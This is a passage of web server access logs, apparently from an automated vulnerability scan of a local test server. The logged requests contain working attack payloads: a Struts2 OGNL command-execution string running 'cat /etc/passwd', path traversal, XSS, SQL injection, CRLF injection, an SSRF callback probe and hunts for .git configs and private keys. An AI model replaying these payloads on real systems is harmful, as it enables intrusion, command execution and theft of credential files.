+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://ca285tosmpvbafqg07h0ruudwpaqobuud.oast.fun&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%2829KAXwjMQrNRkJHpWSJco16Bl7L%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", 